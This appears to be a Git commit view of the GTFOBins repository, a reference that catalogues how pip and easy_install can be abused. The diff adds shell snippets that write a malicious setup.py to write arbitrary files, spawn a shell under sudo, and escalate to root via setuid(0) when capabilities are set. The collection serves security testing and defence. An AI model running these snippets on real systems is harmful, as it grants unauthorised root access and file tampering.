1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-28 06:59:38 +02:00

Use LFILE in easy_install and pip file-write function

This commit is contained in:
Emilio Pinna 2018-09-29 10:51:00 +01:00
parent f8dab26569
commit a156e10996
2 changed files with 9 additions and 2 deletions

View File

@ -51,9 +51,10 @@ functions:
file-write:
- description: The file path must be absolute.
code: |
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(whereis python)', 'python', '-c', 'open(\"/tmp/file_to_write\",\"w+\").write(\"DATA\")')" > $TF/setup.py
os.execl('$(whereis python)', 'python', '-c', 'open(\"$LFILE\",\"w+\").write(\"DATA\")')" > $TF/setup.py
easy_install $TF
file-read:
- description: The read file content is wrapped within program messages.

View File

@ -50,8 +50,9 @@ functions:
file-write:
- description: It needs an absolute local file path.
code: |
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo 'open("/tmp/file_to_write","w+").write("DATA")' > $TF/setup.py
echo "open('$LFILE','w+').write('DATA')" > $TF/setup.py
pip install $TF
file-read:
- description: The read file content is corrupted as wrapped within an exception error.
@ -69,4 +70,9 @@ functions:
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
capabilities-enabled:
- code: |
TF=$(mktemp -d)
echo "import os; os.setuid(0); os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
./easy_install
---